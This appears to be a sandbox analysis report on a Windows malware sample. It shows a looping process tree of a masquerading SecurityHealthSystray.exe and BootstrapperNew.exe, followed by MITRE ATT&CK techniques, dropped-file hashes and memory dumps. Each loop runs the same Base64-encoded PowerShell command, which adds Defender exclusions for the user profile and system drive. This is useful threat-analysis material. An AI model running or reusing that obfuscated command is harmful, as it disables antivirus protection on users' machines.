        
        PID:5720
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        23⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        23⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        24⤵
        
        PID:484
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        24⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        24⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        25⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        25⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        25⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        26⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        26⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        26⤵
        
        PID:6176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        27⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        27⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        27⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        28⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        28⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        28⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        29⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        29⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        29⤵
        
        PID:6908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAaABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAZQBmACMAPgA="
        30⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
        
        "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
        30⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        30⤵
        
        PID:7136

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
PID:4328

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
PID:4812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
9e466b4837d8431be725d6b9c1b4d9ef

SHA1
3f247b7c89985a41d839cad351cd0fc182fcb284

SHA256
2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d

SHA512
01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
960B

MD5
16846df493521e84fe47cd6b6451ec8f

SHA1
6d99eb017c5aec08d3a7e908bbd4a051ce250c02

SHA256
69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9

SHA512
aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecurityHealthSystray.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
535b473ec3e9c0fd5aad89062d7f20e8

SHA1
c900f90b3003452b975185c27bfb44c8f0b552c4

SHA256
f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0

SHA512
33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3c2f2c936a522af91ee875f2ac4d4189

SHA1
95469b1ba315a4353755a323b3eee1977110b444

SHA256
32e5aaac3c6e20d60d7cae87a1e3e965720a179353e0981b7872c231e8d60f49

SHA512
c452c87b74a627fe91ae1c4e0ea9dfbb71393e609dc7442fd64194095bf80cf8302304bc554df223d8632d1ab2bc417ce8119497851614b361e9841b8a57f7ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d719ef7a2ccae4f23531c93ce8052bac

SHA1
e1dde06268a8e840e4a8380ad25673b6d093e412

SHA256
a6992465a0562bf250528aac474893b077ff6a0ffe80e332a25074a969f2a083

SHA512
93cbaeda7a3c494bb90d532b771e5ccc462eb065a597bcc059a788c4c4c44beb98ce52c196397953cee4a4e397c3ef80592168bc0e2eb7401ca6b8b9fe9172ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
66be77f7fb0540405c216d14c6ff8f3f

SHA1
5a2035f7fdf3ab6c3ceeaad77a47e1aa70ef3c86

SHA256
b4fdedaea081b45407e662e3e2b979d416e05295351660579cc3ef3d22824d59

SHA512
a4c2671283bed87718854a93d6e0efaf4f158590445854609615ef8b4fb1ffdeb7b874c035c882a63385c1e203a4689dad1946706e1feaf98be4e872f96eac2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
70fcec2520bc15051277e6e895136cca

SHA1
4a73eee69e2d50008fb3f9d825726ac993c3b5ba

SHA256
ff646151a786faf5ac5a61fab524bafb4efebaf5953b47e0c8370d8413cf6a29

SHA512
a922b100b9bfa5f469baabc4fd19b87cec6516ad8b96c498946b8d71d10c1a4a50850855893d5328e428f9e2b2ca4c6ebed30ed1db8afe1ab4f747ee1f283c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlbg305h.ma3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe

Filesize
120KB

MD5
65783920c1b66598f656084196f17480

SHA1
71bea99442c47575e9636532d71df8357452e32d

SHA256
d0fa8e51c0f14be5d398e49f017adbb1b33ddbf1a845269c7b938adb9294f021

SHA512
dba8c556f138a1b2138af2925ad500f88c0f72fa508c56153662ce2611640551baa17ef4b6603fc55acabbfe70c74ff7ae9270442d4061fe0c4bcc45534ada30

Download Submit
memory/1260-122-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/1476-303-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/2008-12-0x0000000000C70000-0x0000000000C94000-memory.dmp

Filesize
144KB

Download
memory/2008-283-0x00007FF8F3490000-0x00007FF8F3F52000-memory.dmp

Filesize
10.8MB

Download
memory/2008-11-0x00007FF8F3493000-0x00007FF8F3495000-memory.dmp

Filesize
8KB

Download
memory/2008-108-0x00007FF8F3490000-0x00007FF8F3F52000-memory.dmp

Filesize
10.8MB

Download
memory/2028-150-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/2200-175-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/2560-239-0x0000020C7CFE0000-0x0000020C7D002000-memory.dmp

Filesize
136KB

Download
memory/2568-229-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3156-211-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3276-284-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3384-86-0x0000000006E40000-0x0000000006EE4000-memory.dmp

Filesize
656KB

Download
memory/3384-85-0x0000000006190000-0x00000000061AE000-memory.dmp

Filesize
120KB

Download
memory/3384-28-0x0000000005750000-0x0000000005AA7000-memory.dmp

Filesize
3.3MB

Download
memory/3384-149-0x0000000007190000-0x000000000719E000-memory.dmp

Filesize
56KB

Download
memory/3384-55-0x0000000005C00000-0x0000000005C1E000-memory.dmp

Filesize
120KB

Download
memory/3384-56-0x00000000061E0000-0x000000000622C000-memory.dmp

Filesize
304KB

Download
memory/3384-67-0x0000000006E00000-0x0000000006E34000-memory.dmp

Filesize
208KB

Download
memory/3384-68-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3384-161-0x0000000007290000-0x00000000072AA000-memory.dmp

Filesize
104KB

Download
memory/3384-110-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download
memory/3384-192-0x0000000007280000-0x0000000007288000-memory.dmp

Filesize
32KB

Download
memory/3512-109-0x0000000007C40000-0x0000000007C5A000-memory.dmp

Filesize
104KB

Download
memory/3512-14-0x00000000054A0000-0x00000000054D6000-memory.dmp

Filesize
216KB

Download
memory/3512-15-0x0000000005B10000-0x000000000613A000-memory.dmp

Filesize
6.2MB

Download
memory/3512-17-0x0000000005950000-0x0000000005972000-memory.dmp

Filesize
136KB

Download
memory/3512-18-0x0000000006330000-0x0000000006396000-memory.dmp

Filesize
408KB

Download
memory/3512-19-0x00000000063A0000-0x0000000006406000-memory.dmp

Filesize
408KB

Download
memory/3512-87-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3844-159-0x0000000007770000-0x0000000007785000-memory.dmp

Filesize
84KB

Download
memory/3844-119-0x00000000075A0000-0x00000000075AA000-memory.dmp

Filesize
40KB

Download
memory/3844-121-0x00000000077A0000-0x0000000007836000-memory.dmp

Filesize
600KB

Download
memory/3844-131-0x0000000007720000-0x0000000007731000-memory.dmp

Filesize
68KB

Download
memory/3844-91-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3940-256-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/4272-194-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/4328-172-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-164-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-162-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-173-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-163-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-174-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-168-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-169-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-170-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4328-171-0x0000020821E70000-0x0000020821E71000-memory.dmp

Filesize
4KB

Download
memory/4696-314-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download